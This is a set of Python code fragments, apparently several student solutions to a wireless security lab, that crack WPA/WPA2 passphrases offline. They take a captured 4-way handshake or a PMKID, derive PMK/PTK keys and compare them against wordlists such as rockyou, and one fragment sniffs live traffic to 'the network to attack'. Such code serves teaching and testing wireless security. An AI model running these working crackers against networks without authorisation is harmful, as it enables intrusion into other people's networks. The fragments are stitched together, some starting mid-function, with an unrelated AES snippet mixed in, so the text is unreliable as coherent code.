def keyDerivation(passphrase, ssid, ap_mac, sta_mac, ANonce, SNonce, data, hmac_algo): ''' Calculate PMK/PTK/MIC ''' A = "Pairwise key expansion" #this string is used in the pseudo-random function B = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min( ANonce, SNonce) + max(ANonce, SNonce) #used in pseudo-random function #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK passphrase = str.encode(passphrase) ssid = str.encode(ssid) pmk = pbkdf2(hashlib.sha1, passphrase, ssid, 4096, 32) #expand pmk to obtain PTK ptk = customPRF512(pmk, str.encode(A), B) #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK if (hmac_algo == 1): mic = hmac.new(ptk[0:16], data, hashlib.md5) elif (hmac_algo == 2): mic = hmac.new(ptk[0:16], data, hashlib.sha1) return pmk, ptk, mic
def tryPmkid(passphrase, ssid, ap_mac, sta_mac): passphrase = str.encode(passphrase) pmk = pbkdf2(hashlib.sha1, passphrase, str.encode(ssid), 4096, 32) pmk_data = str.encode("PMK Name") + a2b_hex(ap_mac) + a2b_hex(sta_mac) pmkid = b2a_hex(hmac.new(pmk, pmk_data, hashlib.sha1).digest()[:16]).decode('UTF-8') return pmkid
def calcMIC(wpa): # Important parameters for key derivation - some of them can be obtained from the pcap file # passPhrase = "actuelle" #this is the passphrase of the WPA network A = "Pairwise key expansion" # this string is used in the pseudo-random function and should never be modified ssid = wpa[0].info # "SWI" APmac = a2b_hex(wpa[1].addr2.replace( ":", "")) # a2b_hex("cebcc8fdcab7") #MAC address of the AP Clientmac = a2b_hex(wpa[1].addr1.replace( ":", "")) # a2b_hex("0013efd015bd") #MAC address of the client # Authenticator and Supplicant Nonces ANonce = a2b_hex( b2a_hex(wpa[5].load)[26:90] ) # a2b_hex("90773b9a9661fee1f406e8989c912b45b029c652224e8b561417672ca7e0fd91") SNonce = a2b_hex( b2a_hex(wpa[6].load)[26:90] ) # a2b_hex("7b3826876d14ff301aee7c1072b5e9091e21169841bce9ae8a3f24628f264577") # This is the MIC contained in the 4th frame of the 4-way handshake. I copied it by hand. # When trying to crack the WPA passphrase, we will compare it to our own MIC calculated using passphrases from a dictionary # mic_to_test = b2a_hex(wpa[8].load[77:93]) # "36eef66540fa801ceee2fea9b7929b40" mic_to_test = b2a_hex(wpa[8].load)[154:186] B = min(APmac, Clientmac) + max(APmac, Clientmac) + min( ANonce, SNonce) + max(ANonce, SNonce) # used in pseudo-random function # Take a good look at the contents of this variable. Compare it to the Wireshark last message of the 4-way handshake. # In particular, look at the last 16 bytes. Read "Important info" in the lab assignment for explanation data = bytes(wpa[8].payload.payload.payload.payload.payload) data = data[:-18] + data[-34:-18] + data[-2:] with open(filename) as dictionary: for passPhrase in dictionary: # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK passPhrase = str.encode(passPhrase)[:-1] pmk = pbkdf2(hashlib.sha1, passPhrase, ssid, 4096, 32) # expand pmk to obtain PTK ptk = customPRF512(pmk, str.encode(A), B) # calculate our own MIC over EAPOL payload - The ptk is, in fact, KCK|KEK|TK|MICK if int.from_bytes(wpa[5].load[0:1], byteorder='big') == 2: mic = hmac.new(ptk[0:16], data, hashlib.sha1) else: mic = hmac.new(ptk[0:16], data, hashlib.md5) # # the MIC for the authentication is actually truncated to 16 bytes (32 chars). SHA-1 is 20 bytes long. # MIC_hex_truncated = mic.hexdigest()[0:32] mic_digest = mic.hexdigest()[:-8] print(mic_to_test.decode()) print(mic_digest) if mic_to_test.decode() == mic_digest: print("Found the passphrase : ", passPhrase) return True return False
def pkt_callback(pkt): # Read the passphrase from the file wordlist passPhrases = open("wordlist", "r").read().split("\n") A = "Pairwise key expansion" #this string is used in the pseudo-random function #cf "Quelques détails importants" dans la donnée data = a2b_hex( "0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" ) if pkt.haslayer(EAPOL): # We supposed that the handshake packets are arriving in the correct order and one after another pktList.append(pkt) if (len(pktList) == 4): # Authenticator and Supplicant Nonces # We transform them to the correct encoding ANonce = a2b_hex(pktList[0].getlayer(Raw).load.hex()[26:90]) SNonce = a2b_hex(pktList[1].getlayer(Raw).load.hex()[26:90]) APmac = a2b_hex((pktList[0][Dot11].addr3).replace(":", "")) Clientmac = a2b_hex((pktList[0][Dot11].addr1).replace(":", "")) # This is the MIC contained in the 4th frame of the 4-way handshake # When attacking WPA, we would compare it to our own MIC calculated using passphrases from a dictionary mic_to_test = pktList[3].getlayer(Raw).load.hex()[154:-4] print("[*] MIC found: " + mic_to_test) B = min(APmac, Clientmac) + max(APmac, Clientmac) + min( ANonce, SNonce) + max(ANonce, SNonce) #used in pseudo-random function for passPhrase in passPhrases: # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK passPhrase = str.encode(passPhrase) pmk = pbkdf2(hashlib.sha1, passPhrase, str.encode(ssid), 4096, 32) # expand pmk to obtain PTK ptk = customPRF512(pmk, str.encode(A), B) # calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK mic = hmac.new(ptk[0:16], data, hashlib.sha1) print(mic.hexdigest()) if mic.hexdigest()[:len(mic_to_test)] == mic_to_test: print("[*] The passphrase (" + str(passPhrase) + ") is correct") exit() print("[*] The passphrase: " + str(passPhrase) + " is not correct. Try with a different passphrase")
def compute_pmkid(passphrase, ssid, bssid, sta_mac): """ Compute the PMKID for the given passphrase, BSSID and STA MAC address. :param passphrase: the passphrase :param bssid: the AP's BSSID :param sta_mac: the STA MAC address :return: """ pmk = pbkdf2(hashlib.sha1, str.encode(passphrase), ssid, 4096, 32) data = b'PMK Name' + mac2str(bssid) + mac2str(sta_mac) return hmac.new(pmk, data, hashlib.sha1).digest()[:16] # first 128 bits only
def bruteForceWPA(handshakeList): global ssid global APmac global Clientmac # Authenticator and Supplicant Nonces nonceStartingOffset = 13 nonceEndOffset = 45 ANonce = handshakeList[0].load[nonceStartingOffset:nonceEndOffset] SNonce = handshakeList[1].load[nonceStartingOffset:nonceEndOffset] # This is the MIC contained in the 4th frame of the 4-way handshake # When attacking WPA, we would compare it to our own MIC calculated using passphrases from a dictionary micStartingOffset = 77 micEndOffset = 93 mic_to_test = handshakeList[3].load[micStartingOffset:micEndOffset] B = min(APmac,Clientmac)+max(APmac,Clientmac)+min(ANonce,SNonce)+max(ANonce,SNonce) #used in pseudo-random function # Here we are taking the data from the WIFI version, until the start of the MIC, and then we simply append a bunch of zero bytes at the end. data = bytes(handshakeList[3][EAPOL])[:micStartingOffset] + b'\x00' * 22 ssid = str.encode(ssid) fileName = arguments.w found = False # Used to know wether it is HMAC-MD5 or HMAC-SHA1 keyDescriptorVersion = int.from_bytes(handshakeList[0].load[0:1], byteorder='big') with open(fileName) as wordlist: for passPhrase in wordlist: # Calculate 4096 rounds to obtain the 256 bit (32 oct) PMK # We are getting rid of the '\n' passPhrase = str.encode(passPhrase[:-1]) pmk = pbkdf2(hashlib.sha1,passPhrase, ssid, 4096, 32) # Expand pmk to obtain PTK ptk = customPRF512(pmk,str.encode(A),B) # Calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK if(keyDescriptorVersion == 2): # In the case of SHA-1, we have to truncate the hash in order for it to fit in the packet mic = hmac.new(ptk[0:16],data,hashlib.sha1).hexdigest()[:-8] else: mic = hmac.new(ptk[0:16],data,hashlib.md5).hexdigest() if mic == b2a_hex(mic_to_test).decode(): print("[+] Found passphrase: " + passPhrase.decode()) # Source: https://www.geeksforgeeks.org/python-exit-commands-quit-exit-sys-exit-and-os-_exit/ sys.exit("") if not found: print("[-] Passphrase not found !")
def crack(): global ssid, APmac, Clientmac, ANonce, SNonce, mic_to_test, data, sniff, A print ("\n\nValues used to derivate keys") print ("============================") print ("SSID: ",ssid) print ("AP Mac: ",APmac.encode()) print ("Cient Mac: ",Clientmac.encode()) print ("AP Nonce: ",ANonce) print ("Client Nonce: ",SNonce) print ("Mic: ",mic_to_test) B = min(a2b_hex(APmac),a2b_hex(Clientmac))+max(a2b_hex(APmac),a2b_hex(Clientmac))+min(a2b_hex(ANonce),a2b_hex(SNonce))+max(a2b_hex(ANonce),a2b_hex(SNonce)) # Load the wordlist and iterate over it with open("wordlist.txt") as f: while(True): passPhrase = f.readline().replace("\n", "") if passPhrase == "": break #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK passPhrase = str.encode(passPhrase) pmk = pbkdf2(hashlib.sha1,passPhrase,ssid.encode(), 4096, 32) #expand pmk to obtain PTK ptk = customPRF512(pmk,str.encode(A),B) #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK mic = hmac.new(ptk[0:16],data,hashlib.sha1) print ("\nResults of the key expansion") print ("=============================") print ("Passphrase: ",passPhrase) print ("PMK:\t\t",pmk.hex()) print ("PTK:\t\t",ptk.hex()) print ("KCK:\t\t",ptk[0:16].hex()) print ("KEK:\t\t",ptk[16:32].hex()) print ("TK:\t\t",ptk[32:48].hex()) print ("MICK:\t\t",ptk[48:64].hex()) print ("MIC:\t\t",mic.digest()[:-4]) print ("ORIG MIC:\t",mic_to_test) # Check if the calculated mic is the same as the mic if mic_to_test == mic.digest()[:-4]: print("Found Passphrase: ", passPhrase.decode()) exit(0) print("Could not find passphrase")
def crack_pass(pkts, mic_to_test): passwords_file = open(wordlist_filename, 'r') passwords = passwords_file.readlines() passphrase_ret = "Not found" data = bytes(pkts[3][EAPOL])[:77] + b'\x00' * 22 print("\nCracking WPA Passphrase") print("=============================") for psw in passwords: # We don't take the final '\n' passphrase = str.encode(psw[:-1]) #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK pmk = pbkdf2(hashlib.sha1, passphrase, str.encode(ssid), 4096, 32) #expand pmk to obtain PTK B = min(a2b_hex(APmac.replace(":", "")), a2b_hex(Clientmac.replace(":", ""))) + max( a2b_hex(APmac.replace(":", "")), a2b_hex(Clientmac.replace(":", ""))) + min( a2b_hex(ANonce), a2b_hex(SNonce)) + max( a2b_hex(ANonce), a2b_hex(SNonce)) ptk = customPRF512(pmk, str.encode(A), B) #Check if it's MD5 or SHA1 with the KeyDescriptorVersion kdv = int.from_bytes(pkts[3].load[0:1], byteorder='big') #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK if kdv == 2: mic = hmac.new(ptk[0:16], data, hashlib.sha1).hexdigest()[:-8] else: mic = hmac.new(ptk[0:16], data, hashlib.md5).hexdigest() print("Passphrase tested : ", psw) #Compare the MICs if hmac.compare_digest(mic, mic_to_test): print("\nPassphrase found !\n") passphrase_ret = psw break print("\nResult of the passphrase cracking") print("=============================") print("The passphrase is : ", passphrase_ret, "\n") passwords_file.close()
def get_passphrase(pmkid, ssid, mac_ap, mac_sta): # format data ssid = ssid.encode() mac_ap = a2b_hex(mac_ap.replace(':', '')) mac_sta = a2b_hex(mac_sta.replace(':', '')) pmkid = pmkid.decode('utf-8') with open("wordlist.txt") as f: for line in f: passphrase = line.replace('\n', '').encode() # generate pmk with a passphrase from the wordlist pmk = pbkdf2(hashlib.sha1, passphrase, ssid, 4096, 32) # generate pmkid related to the actual passphrase pmkid_calc = hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).hexdigest()[:32] # if they match it means we got the right passphrase if (pmkid == pmkid_calc): return passphrase return None
# Read capture file -- it contains beacon, authentication, associacion, handshake and data wpa=rdpcap("PMKID_handshake.pcap") # Important parameters for key derivation - most of them can be obtained from the pcap file ssid = wpa[0].info APmac = a2b_hex(wpa[145].addr2.replace(':','')) Clientmac = a2b_hex(wpa[145].addr1.replace(':','')) PMKID = hexlify(wpa[145].load[101:]) print("SSID :", ssid.decode("utf-8")) print("AP Mac :", b2a_hex(APmac).decode("utf-8")) print("Client Mac :", b2a_hex(Clientmac).decode("utf-8")) #Lecture du fichier de mdp mdpFile = open('rockyou-65.txt', 'r') lines = mdpFile.readlines() #Test de tous les mots de passe de la liste for line in lines : password = str.encode(line[:-1]) pmk = pbkdf2(hashlib.sha1,password, ssid, 4096, 32) pmkid = hmac.new(pmk, str.encode("PMK Name") + APmac + Clientmac, hashlib.sha1).hexdigest()[:32] print(password.decode("utf-8"), pmkid, PMKID.decode("utf-8") ) #Comparaison du PMKID (trouvé dans le fichier pcap) et le PMKID générer avec le mot de passe de la liste if(pmkid == PMKID.decode("utf-8") ): print("The passephrase is " + line) exit(0)
from Crypto.Cipher import AES import os #import PBKDF2 import pbkdf2 #from pbkdf2 import pbkdf2 salt = os.urandom(8) # 64-bit salt key = pbkdf2("This passphrase is a secret.", salt).read(32) # 256-bit key iv = os.urandom(16) # 128-bit IV cipher = AES.new(key, AES.MODE_CBC, iv)
mic_to_test = wpa[8].load.hex()[-36:][: -4] # "36eef66540fa801ceee2fea9b7929b40" B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(ANonce, SNonce) + max( ANonce, SNonce) #used in pseudo-random function data = a2b_hex( scapy.utils.linehexdump(wpa[8][EAPOL], 0, 1, True).replace( " ", "").lower()[:162] + "0" * 32 + "0" * 4) with open('dico.txt') as f: for passPhrase in f: if (passPhrase[-1] == '\n'): passPhrase = passPhrase[:-1] #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK pmk = pbkdf2(hashlib.sha1, passPhrase.encode(), ssid, 4096, 32) #expand pmk to obtain PTK ptk = customPRF512(pmk, str.encode(A), B) #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK mic = hmac.new(ptk[0:16], data, hashlib.sha1) # We remove the icv, because it's not relevant for the attack. #Mic comparison if (mic.hexdigest()[:-8] == mic_to_test): foundPassphrase = True print("\n\npassPhrase found, value : ", passPhrase, "\n") print("Values used to derivate keys") print("============================")
def PMKID(key, ssid, staMAC, apMAC): key = pbkdf2(hashlib.sha1, key, ssid, 4096, 32) return hmac.new(key, str.encode('PMK Name') + apMAC + staMAC, hashlib.sha1).digest()[:16]
def main(): APmac = b'' Clientmac = b'' ANonce = b'' SNonce = b'' crypto = b'' mic_to_test = b'' # Get 1000 packages from the monitor interface wpa = sniff(iface='wlp1s0mon', count=1000) # The network to attack ssid = "SWI" # Get the Association request who contains APmac address, Clientmac address and the ssid # We verify if the packet is from the network to attack for trame in wpa: if trame.subtype == 0x0 and trame.type == 0x0 and trame.info.decode( "ascii") == ssid: APmac = a2b_hex(trame.addr1.replace(':', '')) Clientmac = a2b_hex(trame.addr2.replace(':', '')) break # Get the ANonce based on the MAC address for trame in wpa: if trame.subtype == 0x0 \ and trame.type == 0x2 \ and a2b_hex(trame.addr2.replace(':', '')) == APmac \ and a2b_hex(trame.addr1.replace(':', '')) == Clientmac: ANonce = trame.getlayer(WPA_key).nonce break isSNonceKnown = False for trame in wpa: # Get the SNonce based on the MAC address if not isSNonceKnown \ and trame.subtype == 0x8 \ and trame.type == 0x2 \ and a2b_hex(trame.addr1.replace(':', '')) == APmac \ and a2b_hex(trame.addr2.replace(':', '')) == Clientmac: SNonce = raw(trame)[65:-72] isSNonceKnown = True # Get the WPA key MIC elif trame.subtype == 0x8 \ and trame.type == 0x2 \ and a2b_hex(trame.addr1.replace(':', '')) == APmac \ and a2b_hex(trame.addr2.replace(':', '')) == Clientmac: mic_to_test = raw(trame)[-18:-2].hex() # Get the value of the key Information MD5 (1) or SHA1 (2) crypto = raw(trame)[0x36] & 0x2 # --------------------------------------------------------------- # Get a list of passPhrase from the wordlist wordlist = open("wordlist.txt", "r") passPhrases = [x.strip() for x in wordlist.readlines()] wordlist.close() ssid = str.encode(ssid) # Test chaque passPhrase for passPhrase in passPhrases: # Important parameters for key derivation - most of them can be obtained from the pcap file A = "Pairwise key expansion" # this string is used in the pseudo-random function B = min(APmac, Clientmac) + max(APmac, Clientmac) + min( ANonce, SNonce) + max(ANonce, SNonce) # used in pseudo-random function data = a2b_hex( "0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" ) # cf "Quelques détails importants" dans la donnée # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK passPhrase = str.encode(passPhrase) # MD5 = 0x01 & SHA1 = 0x02 if crypto == 0x01: pmk = pbkdf2(hashlib.md5, passPhrase, ssid, 4096, 32) else: pmk = pbkdf2(hashlib.sha1, passPhrase, ssid, 4096, 32) # expand pmk to obtain PTK ptk = customPRF512(pmk, str.encode(A), B) # calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK mic = hmac.new(ptk[0:16], data, hashlib.sha1) # Test if the current passphrase is valid if mic_to_test == mic.hexdigest()[:32]: print("You win ! The passphrase is : " + passPhrase.decode()) return False return True
print("\n\nValues used to derivate keys") print("============================") print("Passphrase: ", passPhrase, "\n") print("SSID: ", ssid, "\n") print("AP Mac: ", b2a_hex(APmac), "\n") print("CLient Mac: ", b2a_hex(Clientmac), "\n") print("AP Nonce: ", b2a_hex(ANonce), "\n") print("Client Nonce: ", b2a_hex(SNonce), "\n") ssid = str.encode(ssid) wpaVersion = wpa[8][EAPOL].load[2] #Contient la version description de la clé # Test chaque passephrase du dictionnaire for i in range(len(dic)): #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK passPhrase = str.encode(dic[i]) pmk = pbkdf2(hashlib.sha1 if wpaVersion == 10 else hashlib.md5, passPhrase, ssid, 4096, 32) #expand pmk to obtain PTK ptk = customPRF512(pmk, str.encode(A), B) #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK mic = hmac.new(ptk[0:16], data, hashlib.sha1).hexdigest()[:-8] print("Mic to test : ", mic_to_test, "\n") print("Mic generated : ", mic, "\n") if mic == mic_to_test: print("Good passphrase : ", passPhrase.decode(), "\n") break else: print("Bad passphrase : ", passPhrase.decode(), "\n") if i == len(dic) - 1:
B = min(APmac, Clientmac) + max(APmac, Clientmac) + min(ANonce, SNonce) + max( ANonce, SNonce) #used in pseudo-random function data = a2b_hex( "0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" ) #cf "Quelques détails importants" dans la donnée ssid = str.encode(ssid) for word in passphrase: wordEncode = str.encode(word) # Check the version of the key to apply MD5 or SHA-1 if keyInformation != 10: pmk = pbkdf2(hashlib.md5, wordEncode, ssid, 4096, 32) else: pmk = pbkdf2(hashlib.sha1, wordEncode, ssid, 4096, 32) #expand pmk to obtain PTK ptk = customPRF512(pmk, str.encode(A), B) #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK, [:-8] to remove the ICV mic = hmac.new(ptk[0:16], data, hashlib.sha1).hexdigest()[:-8] # Test if the two mic match, if yes print message and stop, if not continue to check with the word in file if mic == mic_to_test: print("The passphrase used is correct : ", word, "\n") break else: print("Try a new passphrase : ", word, "\n")
passphrases = [word for line in file for word in line.split()] # For each potential passphrase in the file we calculate the MIC for passPhrase in passphrases: print("Passphrase tested : ", passPhrase) A = "Pairwise key expansion" #this string is used in the pseudo-random function B = min(APmac, Clientmac) + max(APmac, Clientmac) + min( ANonce, SNonce) + max(ANonce, SNonce) #used in pseudo-random function data = a2b_hex( "0103005f02030a0000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" ) #cf "Quelques détails importants" dans la donnée #calculate 4096 rounds to obtain the 256 bit (32 oct) PMK passPhrase = str.encode(passPhrase) pmk = pbkdf2(hashlib.sha1, passPhrase, str.encode(ssid), 4096, 32) #expand pmk to obtain PTK ptk = customPRF512(pmk, str.encode(A), B) #calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK mic = hmac.new(ptk[0:16], data, hashlib.sha1) # MIC calculated with key derivated from potential passphrase tested current_mic = mic.hexdigest()[:-8] # If the MIC calculated above is the same as the one from the last 4-way handshake message, we found the passphrase if current_mic == mic_to_test: print("PASSPHRASE FOUND : ", passPhrase.decode()) exit(0)
for i in range(len(wpa)): if wpa[i].haslayer(EAPOL): """ Il s'agit des informations de la clé (Champs <<Key Information>>), elle définit les différents flags tel que les clés qui sont "set" ou non, s'il y a une erreur, etc... . La valeur 0x008a au niveau des flags de la clé est toujours la même pour le message 1 dans la pcap de ce labo ou du labo précédent. """ if wpa[i][EAPOL].original.hex()[10:14] == "008a": wpaMessageOne = wpa[i] PMKID = binascii.hexlify(wpaMessageOne.getlayer(Raw).load)[ 202:234] # Extraction de la PMKID. if PMKID != nullPMKID and PMKID != '': found = True break # On évite de bouclé inutilement si on trouve le message 1 du 4 way handshake. if not found: exit("No PMKID found") print("PMKID : ", PMKID.decode()) print("AP Mac : ", b2a_hex(APmac).decode()) print("Client Mac : ", b2a_hex(Clientmac).decode()) for i in range(len(dic)): passPhrase = str.encode(dic[i]) pmk = pbkdf2(hashlib.sha1, bytes(passPhrase), ssid.encode('utf-8'), 4096, 32) pmkid_calc = hmac.new(pmk, "PMK Name".encode('utf-8') + APmac + Clientmac, digestmod=hashlib.sha1).hexdigest() if pmkid_calc[:-8].encode('utf-8') == PMKID: print("\nMot de passe trouvé : ", passPhrase.decode())
except: pass except: pass pmkid = hexlify(handshake.load)[-32:] ap_mac = a2b_hex(str.replace(handshake.addr2, ":", "")) client_mac = a2b_hex(str.replace(handshake.addr1, ":", "")) data = A.encode() + ap_mac + client_mac found = False with open(filename) as dictionary: for passPhrase in dictionary: # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK passPhrase = str.encode(passPhrase)[:-1] pmk = pbkdf2(hashlib.sha1, passPhrase, ssid, 4096, 32) pmkid_calc = hmac.new(pmk, data, hashlib.sha1) test = pmkid_calc.hexdigest()[:-8] if pmkid == str.encode(test): print("Passphrase is : " + passPhrase.decode()) found = True if not found: print("No passphrase found")
except Exception as e: #print(e) continue print("\nValues used to execute PKMID attack") print("============================") print("SSID: ", ssid.decode("utf-8")) print("AP Mac: ", b2a_hex(APmac).decode("utf-8")) print("CLient Mac: ", b2a_hex(Clientmac).decode("utf-8"), "\n") # Début de l'attaque PMKID print("Starting the PMKID attack") with open('dictionnary' ) as dictionnary: # Ouverture du dictionnaire personnalisé for currentPass in dictionnary: # On parcourt tous les mots du dictionnaire currentPass = currentPass[:-1] # On enleve le \n print("Testing " + currentPass) currentPass = str.encode( currentPass) # On transforme la string en bytes pmkTmp = pbkdf2(hashlib.sha1, currentPass, ssid, 4096, 32) # Calcul du PMK pmkidTmp = hmac.new(pmkTmp, str.encode("PMK Name") + APmac + Clientmac, hashlib.sha1).hexdigest( )[:32] # Calcul du PMKID pour le pass courant if ( pmkid == str.encode(pmkidTmp) ): # On vérifie si le PMKID calculé est le même que celui récupéré dans les trames, si oui on arrête si non on test une autre passphrase. print("!!! pass found " + currentPass.decode("utf-8") + " !!!") exit(1)
mic_to_test = wpa[8].load[77:93] #c'est le 4eme handshake qui contient le mic #"36eef66540fa801ceee2fea9b7929b40" B = min(APmac,Clientmac)+max(APmac,Clientmac)+min(ANonce,SNonce)+max(ANonce,SNonce) #used in pseudo-random function data = bytes(wpa[8][EAPOL])[0:77] + b'\x00'*(len(mic_to_test)+6) #we copy until where the mic start, then pad with the length of the mix + some bytes to have only zeros at the end ssid = str.encode(ssid) # read wordlist line by line with open('wordlist.txt') as fp: passPhrase = fp.readline()[:-1] found = False while passPhrase: pp = str.encode(passPhrase) # calculate 4096 rounds to obtain the 256 bit (32 oct) PMK pmk = pbkdf2(hashlib.sha1,pp, ssid, 4096, 32) # expand pmk to obtain PTK ptk = customPRF512(pmk,str.encode(A),B) # calculate MIC over EAPOL payload (Michael)- The ptk is, in fact, KCK|KEK|TK|MICK # compute mic from pass phrase mic = hmac.new(ptk[0:16],data,algo).digest()[:16] # test the computed mic with the mic from the handshake if mic.hex() == mic_to_test.hex(): print("The pass phrase is : " + passPhrase) found = True break passPhrase = fp.readline()[:-1]